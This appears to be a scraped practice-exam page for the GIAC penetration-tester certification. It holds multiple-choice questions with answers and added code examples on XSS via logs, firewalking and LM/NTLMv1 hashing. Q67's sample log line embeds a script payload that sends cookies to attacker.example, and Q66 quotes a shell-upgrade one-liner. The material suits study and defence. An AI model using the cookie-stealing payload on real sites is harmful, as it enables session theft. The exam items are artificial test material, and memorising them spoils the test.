Source: https://www.exambible.com/GPEN-exam/

Exam Code: GPEN (Practice Exam Latest Test Questions VCE PDF)
Exam Name: GIAC Certified Penetration Tester
Certification Provider: GIAC

Q65. - (Topic 1) 

Which of the following is possible in some SQL injection vulnerabilities on certain types of databases that affects the underlying server OS? 

A. Database structure retrieval 

B. Shell command execution 

C. Data manipulation 

D. Data query capabilities 

Answer: B

Explanation: On some database engines a SQL injection can be escalated from the database into the operating system through server-side procedures that run shell commands (for example xp_cmdshell on Microsoft SQL Server, when it is enabled). Schema retrieval, data manipulation and data querying stay inside the database and do not affect the underlying server OS. Reference: 

http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/ 


Q66. - (Topic 1) 

You are pen testing a network and have shell access to a machine via Netcat. You try to use ssh to access another machine from the first machine. What is the expected result? 

A. The ssh connection will succeed if you have root access on the intermediate machine 

B. The ssh connection will fail 

C. The ssh connection will succeed 

D. The ssh connection will succeed if no password required 

Answer: B

Explanation: A shell spawned over Netcat has no controlling terminal. ssh reads the password and the host-key confirmation from /dev/tty, so in a bare Netcat shell those prompts cannot be answered and the connection fails. Upgrading the shell to a pseudo-terminal first (for example python -c 'import pty; pty.spawn("/bin/bash")'), or using key-based authentication with host-key checking disabled, avoids the problem.


Q67. - (Topic 1) 

How can web server logs be leveraged to perform Cross-Site Scripting (XSS)? 

A. Web logs containing XSS may execute shell scripts when opened in a GUI text browser 

B. XSS attacks cause web logs to become unreadable and therefore are an effective DoS attack. 

C. If web logs are viewed in a web-based console, log entries containing XSS may execute in the browser. 

D. When web logs are viewed in a terminal, XSS can escape to the shell and execute commands. 

Answer: C

Explanation: Request fields such as the URL, Referer and User-Agent are attacker-controlled and are written to the log verbatim. A log viewer that renders those fields into HTML without escaping them turns the log into a stored XSS vector against whoever reads it in a browser.
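The vulnerable and fixed rendering paths side by side, as an added example that is not part of the original question bank. The log line is constructed for this example (no real server produced it), and the two render functions stand in for a hypothetical web-based log console; the only real defence shown is HTML-escaping every log field before it reaches the page.

```python
import html
import re

# Constructed sample: one Combined Log Format line whose User-Agent field carries a
# script tag. Made up for this example, not a capture from any real server.
SAMPLE_LOG = (
    '203.0.113.7 - - [10/Oct/2018:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 '
    '"-" "<script>document.location=\'http://attacker.example/?c=\'+document.cookie</script>"'
)

# Combined Log Format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

COLUMNS = ("ip", "time", "request", "status", "agent")


def parse_combined(line):
    """Split one Combined Log Format line into its fields."""
    m = LOG_RE.match(line)
    if not m:
        raise ValueError("not a Combined Log Format line")
    return m.groupdict()


def render_row_unsafe(entry):
    """Vulnerable console (hypothetical): fields are concatenated straight into HTML,
    so markup inside the User-Agent is interpreted by the analyst's browser."""
    return "<tr>" + "".join(f"<td>{entry[k]}</td>" for k in COLUMNS) + "</tr>"


def render_row_safe(entry):
    """Fixed console: every field is HTML-escaped, so the same data is displayed as
    text instead of executed."""
    return "<tr>" + "".join(
        f"<td>{html.escape(entry[k], quote=True)}</td>" for k in COLUMNS
    ) + "</tr>"


def contains_live_markup(rendered):
    """Quick check a reviewer can run over console output: did a raw tag survive?"""
    return re.search(r"<script\b", rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    entry = parse_combined(SAMPLE_LOG)
    print("unsafe:", render_row_unsafe(entry))
    print("safe:  ", render_row_safe(entry))
```

The same escaping rule applies to any other place log data is rendered as HTML, such as an e-mailed report or a dashboard widget; escaping at render time, not at log-write time, keeps the stored log faithful to what the client actually sent.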


Q68. - (Topic 1) 

A penetration tester used a client-side browser exploit from Metasploit to get an unprivileged shell prompt on the target Windows desktop. The penetration tester then tried using the getsystem command to perform a local privilege escalation, which failed. Which of the following could resolve the problem? 

A. Load priv module and try getsystem again 

B. Run getuid command, then getpriv command, and try getsystem again 

C. Run getuid command and try getsystem again 

D. Use getprivs command instead of getsystem 

Answer: A

Explanation: getsystem is provided by Meterpreter's priv extension (loaded with use priv or load priv); without it the command is not available, which is the situation this question targets. Current Metasploit loads priv automatically, so in practice a getsystem that is present but fails from a medium-integrity (non-administrator) session needs a UAC bypass or another local privilege escalation first; getuid and getprivs only report the current user and privileges.


Q69. - (Topic 1) 

Analyze the command output below, what action is being performed by the tester? 

[command output image not included in this extraction]

A. Displaying a Windows SAM database 

B. Listing available workgroup services 

C. Discovering valid user accounts 

D. Querying locked out user accounts 

Answer:


Q70. - (Topic 2) 

Which of the following statements are true about firewalking? 

Each correct answer represents a complete solution. Choose all that apply. 

A. To use firewalking, the attacker needs the IP address of the last known gateway before the firewall and the IP address of a host located behind the firewall. 

B. Firewalking works on the UDP packets. 

C. In this technique, an attacker sends a crafted packet with a TTL value that is set to expire one hop past the firewall. 

D. A malicious attacker can use firewalking to determine the types of ports/protocols that can bypass the firewall. 

Answer: A,C,D 
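The two phases of firewalking reduced to their decision logic, as an added example that is not part of the original question bank and not the Firewalk tool's own code. The network is a constructed model (ToyPath) with an assumed topology and firewall policy; on a real engagement the same logic is driven by crafted packets and the ICMP time-exceeded replies they provoke. It shows why both addresses from option A are needed: the gateway address tells the ramping phase when to stop, and the host behind the firewall is the destination that forces probes through it.

```python
class ToyPath:
    """Constructed model of one network path (assumed topology, not a live network).

    `routers` lists hop addresses in order; the last one is the last known gateway
    before the firewall, and the firewall's policy is the `allowed` set. `target`
    is the host behind the firewall the probes are addressed to, and
    `first_hop_behind` is the router that answers once a probe has been forwarded."""

    def __init__(self, routers, target, first_hop_behind, allowed):
        self.routers = routers
        self.target = target
        self.first_hop_behind = first_hop_behind
        self.allowed = set(allowed)   # (proto, port) pairs the firewall forwards

    def send(self, proto, port, ttl):
        """Source address of the ICMP time-exceeded the scanner would receive for a
        probe to `target`, or None when the packet is silently dropped."""
        if ttl <= len(self.routers):
            return self.routers[ttl - 1]      # TTL expired on the way to the gateway
        if (proto, port) not in self.allowed:
            return None                       # firewall policy drops it: no reply at all
        return self.first_hop_behind          # forwarded, then expired one hop beyond


def ramp(path, gateway_ip, proto="tcp", port=80, max_ttl=30):
    """Phase 1 (ramping): raise the TTL until the known gateway itself reports
    time-exceeded. That TTL is the hop count to the last gateway before the firewall."""
    for ttl in range(1, max_ttl + 1):
        if path.send(proto, port, ttl) == gateway_ip:
            return ttl
    raise RuntimeError("gateway never answered; cannot firewalk through it")


def firewalk(path, gateway_ip, probes):
    """Phase 2 (scanning): send each probe toward the host behind the firewall with
    TTL = gateway hops + 1, so it expires exactly one hop past the firewall.
    A time-exceeded from an address beyond the gateway proves the firewall forwarded
    that protocol/port; silence means it was filtered."""
    ttl = ramp(path, gateway_ip) + 1
    verdicts = {}
    for proto, port in probes:
        reply = path.send(proto, port, ttl)
        passed = reply is not None and reply != gateway_ip
        verdicts[(proto, port)] = "passes firewall" if passed else "filtered"
    return verdicts


# Constructed example topology: three routers, firewall on the third.
GATEWAY = "203.0.113.1"
EXAMPLE_PATH = ToyPath(
    routers=["10.0.0.1", "10.0.1.1", GATEWAY],
    target="203.0.113.50",
    first_hop_behind="203.0.113.2",
    allowed={("tcp", 80), ("tcp", 443), ("udp", 53)},
)
PROBES = [("tcp", 22), ("tcp", 80), ("tcp", 443), ("udp", 53), ("udp", 161)]

if __name__ == "__main__":
    print("gateway is", ramp(EXAMPLE_PATH, GATEWAY), "hops away")
    for (proto, port), verdict in firewalk(EXAMPLE_PATH, GATEWAY, PROBES).items():
        print(f"{proto}/{port}: {verdict}")
```

The model deliberately treats UDP and TCP probes alike, since the technique only depends on the IP TTL and the ICMP reply, not on the transport; that is also why option B is a poor characterisation rather than a defining property.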


Q71. - (Topic 1) 

Analyze the excerpt from a packet capture between the hosts 192.168.116.9 and 192.168.116.101. What factual conclusion can the tester draw from this output? 

[packet capture image not included in this extraction]

A. Port 135 is filtered, port 139 is open. 

B. Ports 135 and 139 are filtered. 

C. Ports 139 and 135 are open. 

D. Port 139 is closed, port 135 is open 

Answer:


Q72. - (Topic 1) 

What is the main difference between LANMAN and NTLMv1 challenge/responses? 

A. NTLMv1 only pads 16 bytes, whereas LANMAN pads to 21 bytes 

B. NTLMv1 starts with the NT hash, whereas LANMAN starts with the LANMAN hash 

C. NTLMv1 utilizes DES, whereas LANMAN utilizes MD4 

D. NTLMv1 splits the hash into 3 eight-byte pieces, whereas LANMAN splits the hash into 3 seven-byte pieces 

Answer: B

Explanation: The two response computations are identical in structure: the 16-byte hash is padded with five zero bytes to 21 bytes, cut into three 7-byte DES keys, and each key encrypts the 8-byte server challenge, giving a 24-byte response. The only difference is the hash that goes in: the LM hash (DES of a fixed constant under the uppercased, 14-byte password) for LANMAN, and the NT hash (MD4 of the UTF-16LE password) for NTLMv1.
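The shared response structure written out, as an added example that is not part of the original question bank. MD4 is implemented inline because hashlib's md4 is missing on many current OpenSSL builds; the DES step is passed in as a function because the standard library has no DES, and the block uses pycryptodome for it only if that package happens to be installed (an assumption, and optional). The password and challenge values in the main block are the ones used in Microsoft's MS-NLMP test vectors.

```python
import struct

M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320)."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & M32
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for i, j in enumerate(order):
                a = rot((a + fn(b, c, d) + X[j] + k) & M32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(x + y) & M32 for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password, no case folding, no length limit."""
    return md4(password.encode("utf-16-le"))


def lm_hash(password: str, des_ecb_encrypt) -> bytes:
    """LM hash: uppercase, pad or truncate to 14 bytes, DES-encrypt the constant
    "KGS!@#$%" under each 7-byte half. Needs a DES primitive, see below."""
    pw = password.upper().encode("latin-1")[:14].ljust(14, b"\x00")
    return b"".join(des_ecb_encrypt(des_key_from_7(pw[i:i + 7]), b"KGS!@#$%") for i in (0, 7))


def des_key_from_7(k7: bytes) -> bytes:
    """Expand 7 bytes to an 8-byte DES key: 7 data bits plus an odd-parity bit per byte."""
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        byte = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(byte).count("1") % 2 == 0:
            byte |= 1
        out.append(byte)
    return bytes(out)


def response_pieces(hash16: bytes):
    """The structure LM and NTLMv1 share: pad the 16-byte hash with five zero bytes to
    21 bytes and cut it into three 7-byte DES keys. The third key is two hash bytes
    plus five zeros, so it has only 65536 possibilities."""
    if len(hash16) != 16:
        raise ValueError("hash must be 16 bytes")
    padded = hash16 + b"\x00" * 5
    return [padded[i:i + 7] for i in (0, 7, 14)]


def challenge_response(hash16: bytes, challenge8: bytes, des_ecb_encrypt) -> bytes:
    """LM response when given the LM hash, NTLMv1 response when given the NT hash.
    des_ecb_encrypt(key8, block8) must return the 8-byte single-DES encryption."""
    return b"".join(des_ecb_encrypt(des_key_from_7(p), challenge8) for p in response_pieces(hash16))


if __name__ == "__main__":
    nt = nt_hash("Password")
    print("NT hash:", nt.hex())
    for n, piece in enumerate(response_pieces(nt), 1):
        print(f"piece {n}: {piece.hex()} -> DES key {des_key_from_7(piece).hex()}")
    try:
        from Crypto.Cipher import DES  # pycryptodome, optional (assumption: installed)
        des = lambda key, block: DES.new(key, DES.MODE_ECB).encrypt(block)
        challenge = bytes.fromhex("0123456789abcdef")
        print("LM hash:        ", lm_hash("Password", des).hex())
        print("LM response:    ", challenge_response(lm_hash("Password", des), challenge, des).hex())
        ntlmv1 = challenge_response(nt, challenge, des)
        print("NTLMv1 response:", ntlmv1.hex())
        # MS-NLMP section 4.2.2 vector for "Password" and this challenge.
        assert ntlmv1.hex() == "67c43011f30298a2ad35ece64f16331c44bdbed927841f94"
    except ImportError:
        print("pycryptodome not installed; DES step skipped, structure shown above")
```

The third piece is the practical consequence of option D being false for both schemes: because both split at 7-byte boundaries after zero-padding, a captured 24-byte response always leaks the last two hash bytes through a 65536-candidate search, and the remaining 14 bytes are attacked as two independent 56-bit DES keys rather than one 128-bit secret.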